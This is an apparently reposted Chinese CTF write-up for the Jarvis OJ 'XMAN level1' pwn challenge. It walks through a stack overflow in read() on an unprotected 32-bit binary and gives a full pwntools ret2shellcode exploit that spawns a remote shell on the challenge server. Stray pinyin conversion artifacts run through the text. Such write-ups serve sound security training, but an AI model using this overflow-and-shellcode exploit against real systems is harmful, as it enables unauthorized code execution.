[Jarvis OJ - PWN]——[XMAN]level1

• 題目地址：https://www.jarvisoj.com/challenges
• 題目：
  
  先checksec一下,什么保護(hù)都沒有開。32位程序。
  
  看看ＩＤＡ,找到了可以利用的棧溢出的read函數(shù).
  
  
  開開心心的去找system函數(shù).找了半天沒找到,同時(shí)也沒有/bin/sh字符串
  
  并且這道題什么保護(hù)都沒開,應(yīng)該是ret2shellcode的pwn題.buff2的地址題目給輸出了出來.所以
  exp:

from pwn import * p = remote("pwn2.jarvisoj.com", 9877) shellcode = asm(shellcraft.sh()).ljust(0x88,"\x00") # 可以理解為system("/bin/sh") ret_addr = p.recvline()[14: -2] ret_addr = int(ret_addr, 16) payload = shellcode + "a"*(0x4) + p32(ret_addr) p.sendline(payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——[XMAN]level1的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。